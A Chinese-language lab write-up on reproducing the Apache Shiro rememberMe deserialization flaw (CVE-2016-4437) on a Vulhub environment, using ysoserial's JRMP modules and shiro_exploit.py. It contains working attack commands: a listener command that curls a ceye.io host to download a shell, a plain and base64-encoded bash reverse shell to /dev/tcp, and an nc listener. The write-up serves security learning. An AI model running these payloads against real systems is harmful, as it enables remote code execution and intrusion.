shiro反序列化漏洞（CVE-2016-4437）

0x00 Java安全

一 、RMI/JRMP协议

TCP/IP协议相信大家都很了解了，不了解的可以自行百度。在这里我们先来简单来讲讲JRMP协议相关内容。JRMP是一个Java远程方法协议，该协议基于TCP/IP之上，RMI协议之下。也就是说RMI协议传递时底层使用的是JRMP协议，而JRMP底层则是基于TCP传递。RMI默认使用的JRMP进行传递数据，并且JRMP协议只能作用于RMI协议。当然RMI支持的协议除了JRMP还有IIOP协议。那RMI协议又是什么呢？总的来说，RMI协议集合了Java序列化和Java远程方法协议(Java Remote Method Protocol)，是一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法，是分布式应用之间调用的一种手段。笔者个人的理解就是它实现了 java 远程模块之间的共享。

小饭店原来只有一个厨师，切菜洗菜备料炒菜全干。后来客人多了，厨房一个厨师忙不过来，又请了个厨师，两个厨师都能炒一样的菜，这两个厨师的关系是集群。为了让厨师专心炒菜，把菜做到极致，又请了个配菜师负责切菜，备菜，备料，厨师和配菜师的关系是分布式，一个配菜师也忙不过来了，又请了个配菜师，两个配菜师关系是集群。

二、JRMP模块利用

1、ysoserial中的exploit/JRMPClient是作为攻击方的代码，一般会结合payloads/JRMPLIstener使用。攻击流程如下：

• 需要发送payloads/JRMPLIstener内容到漏洞服务器中，在该服务器反序列化完成我们的payload后会开启一个RMI的服务监听在设置的端口上。
• 我们还需要在我们自己的服务器使用exploit/JRMPClient与存在漏洞的服务器进行通信，并且发送一个gadgets对象，达到命令执行的效果。(前面说过RMI协议在传输中传递序列化，接收数据后进行反序列化操作。)

简单来说就是将一个payload发送到服务器，服务器反序列化操作该payload过后会在指定的端口开启RMI监听，然后通过exploit/JRMPClient去发送攻击gadgets对象。

2、该方法和第一钟类似，使用exploit/JRMPListener作为攻击方进行监听，在反序列化漏洞位置发送payloads/JRMPClient向我们的exploit/JRMPListener进行连接，连接后会返回在exploit/JRMPListener的gadgets对象并且进行反序列化。攻击流程如下：

• 攻击方在自己的服务器使用exploit/JRMPListener开启一个RMI监听
• 往存在漏洞的服务器发送payloads/JRMPClient，payload中已经设置了攻击者服务器IP以及JRMPListener监听的端口，漏洞服务器反序列化该payload后，会去连接攻击者开启的RMI监听，在通信过程中，攻击者服务器会发送一个可执行命令的payload（假如存在漏洞的服务器中有使用org.apacje.commons.collections包，则可以发送CommonsCollections系列的payload），从而达到命令执行的结果。

三、ysoserial工具使用

ysoserial 是一款针对 java 反序列化漏洞的神器，它集合了各种 java 框架，如CommonsCollection1、CommonsCollection2、CommonsCollection3等，而这些框架又集合了各种类和接口，因此它可以根据格式各样的利用链构造所需的 payload。利用方式如下：

先在公网vps上执行：

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】'

• port：公网vps上监听的端口号
• commands：需要执行的命令
• ysoserial-0.0.6-SNAPSHOT-BETA-all.jar：下载打包后 ysoserial.jar 的名称

栗子：

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2  rce.267hqw.ceye.io'

然后重启一个shell窗口：

python 【exploit.py】 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】  【JRMPListener port】 JRMPClient

栗子：

python shiro_exploit.py 118.89.53.139  7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139  1099 JRMPClient

0x01 Shiro框架

Apache Shiro是一个Java安全框架，执行身份验证、授权、密码和会话管理。

0x02 漏洞原理

Apache Shiro 框架提供了记住密码的功能（rememberMe），用户登录成功后会生成经过加密并编码的 cookie，因此在识别身份的时候，shiro 会对 cookie 里的 rememberMe 字段进行解密。根据加密的顺序，解密的顺序为：

• 获取rememberMe cookie
• base64 decode
• AES解密（加密密钥硬编码）
• 反序列化（未作过滤处理）

但是在低版本的 shiro 中，AES 加密的密钥 key 被硬编码在代码里，这就意味着每个人都能通过源代码拿到 AES 加密的密钥。因此攻击者就可以：构造恶意对象 => 序列化 => AES加密 => base64编码后，将其作为 cookie 的 rememberMe 字段发送。shiro 收到 rememberMe 后进行解密和反序列化，最终造成反序列化漏洞。

0x03 影响版本

Apache Shiro < 1.2.4

0x04 指纹特征

返回包中包含 rememberMe=deleteMe 字段。

0x05 漏洞复现

一、 环境搭建

下载Ubuntu桌面版作为本次环境搭建的虚拟机：https://cn.ubuntu.com/download/desktop，笔者使用的是Ubuntu 20.04.3 LTS。

安装完成后进行一些配置：

sudo passwd root                 #更改root用户的密码
su root                          #切换root用户
apt-get update                   #更新软件列表
apt-get install                  #安装install命令
apt-get install ssh              #安装ssh服务
apt-get install vim              #安装vim编辑器
apt-get install net-tools        #安装net-tools
sudo apt-get install python3-pip #安装pip命令

由于Ubuntu是默认禁止root用户ssh远程登录的，所以需要更改相关配置文件：

vim /etc/ssh/sshd_config，

• PermitRootLogin yes #允许root认证登录
• PasswordAuthentication yes #允许密码认证（no的话密码正确也不让登录）

sudo service ssh restart  #重启生效
sudo systemctl enable ssh #设置开机自动启用ssh服务
netstat -aptn             #查看端口使用情况
sudo ps -e |grep ssh      #查看ssh服务是否开启

解决Windows（Ctrl+C）和Ubuntu（Ctrl+Shift+V）之间相互复制粘贴问题：

sudo apt-get autoremove open-vm-tools 
sudo apt-get install open-vm-tools-desktop 
重启生效

下载Vulhub靶场模拟漏洞环境：https://vulhub.org，网站文档中有环境启动的详细过程。

启动docker服务：

su root                 #切换到root用户
systemctl enable docker #设置开机自动启用docker服务
systemctl start docker  #启动docker 服务
docker version          #查看docker是否启动

如果未切换至root用户会则会因权限不足而无法启动docker：

解决方案方案如下：

sudo groupadd docker          #添加docker用户组
sudo gpasswd -a $XXX docker   #检测当前用户是否已经在docker用户组中，其中XXX为用户名，例如我的，liangll
sudo gpasswd -a $USER docker  #将当前用户添加至docker用户组
newgrp docker                 #更新docker用户组
docker version                #查看docker是否启动

按照官方文档的操作拉起环境并进行访问：

cd vulhub/shiro/CVE-2016-4437
docker-compose build
docker-compose up -d

查询Ubuntu的ip并在本地进行访问：：


相关测试结束后使用命令docker-compose down移除环境。

二、工具准备

1、配置maven

sudo wget  https://mirrors.tuna.tsinghua.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
tar -zxvf apache-maven-3.6.3-bin.tar.gz
sudo mv apache-maven-3.6.3 /usr/local/maven3
在/etc/profile末尾添加maven环境变量:
export M2_HOME=/usr/local/maven3
export PATH=$PATH:$JAVA_HOME/bin:$M2_HOME/bin
source /etc/profile

环境变量的配置参考：解决linux下source /etc/profile关闭终端失效问题

2、下载并打包ysoserial

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

3、下载Shiro_exploit

Github项目地址：https://github.com/insightglacier/Shiro_exploit

三、漏洞检测

1、检测可用key：

python shiro_exploit.py -u 129.168.202.129:8080 -t 1

不知道为什么一直请求超时，个人感觉是虚拟机环境问题查，阅资料无解，欢迎各位师傅评论区留言表达自己的看法。ps：要是有vps就好了

HTTPConnectionPool(host='129.168.202.129', port=8080): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f8c15d08d50>, 'Connection to 129.168.202.129 timed out. (connect timeout=10)'))

因此我们跳过1~4的漏洞检测，直接对其进行利用。

2、检测可用gadget：

python shiro_exploit.py -u 129.168.202.129:8080 -t 1 -p "ping h9pkw8.ceye.io" -k ""

CEYE是一个用来检测带外（Out-of-Band）流量的监控平台，如DNS查询和HTTP请求，它可以帮助安全研究人员在测试漏洞时收集信息（例如 SSRF / XXE / RFI / RCE）。更多相关内容请戳我

3、开启JRMPListener监听，kali执行：

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl http://h9pkw8.ceye.io/shell -o shell'

4、实现JRMPClient反打，kali执行：

python shiro_exploit.py -u 129.168.202.129:8080 -t 2 -g JRMPClient -p "192.168.202.130:1099" -k ""

四、漏洞利用

1、制作反弹shell代码&监听本地端口：

Java Runtime 配合 bash 编码，在线编码地址：http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/192.168.202.130/1234 0>&1 #反弹shell代码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMi4xMzAvMTIzNCAwPiYx}|{base64,-d}|{bash,-i} #编码后的反弹shell代码

nc -lvp 1234 #监听本地端口

2、开启JRMPListener监听并执行反弹shell命令，kali执行：

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMi4xMzAvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'

3、使用shiro.py生成payload（四.3 + 四.4 ≈ 三.4）：

python shiro.py 192.168.202.130:6666

4、构造数据包伪造cookie，发送payload：

JRMPListener监听端口，查看连接情况：

nc监听端口，查看shell反弹情况：

不知道为什么没有反弹shell，应该还是环境问题，正常情况应该是反弹成功的。

0x06 参考文章

JRMPListener && JRMPClient使用小记

Java安全之ysoserial-JRMP模块分析（一）

windows使用nc命令